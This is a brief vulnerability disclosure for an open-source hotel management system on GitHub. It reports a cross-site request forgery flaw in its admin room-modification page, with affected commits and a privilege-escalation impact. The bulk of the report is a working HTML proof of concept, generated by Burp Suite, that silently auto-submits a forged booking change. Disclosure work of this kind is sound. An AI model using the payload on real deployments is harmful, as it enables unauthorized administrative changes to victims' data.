[description]
Hotel-Management-System was discovered to contain Cross-site request forgery(CSRF) vulnerability via the URI /admin_modify_room.php.
[Vulnerability Type]
Cross-site request forgery(CSRF)
[Vendor of Product]
Hotel-Management-System,https://github.com/vaibhavverma9999/Hotel-Management-System
[Affected Product Code Base]
commit<=91caab8e505a1791780594d23408fb31fcc272cc
[Impact Escalation of Privileges]
true
[POC]
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<form action="http://localhost/admin_modify_room.php" method="POST">
<input type="hidden" name="book_id" value="10017" />
<input type="hidden" name="checkout" value="2024-07-20" />
<input type="submit" value="Submit request" />
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>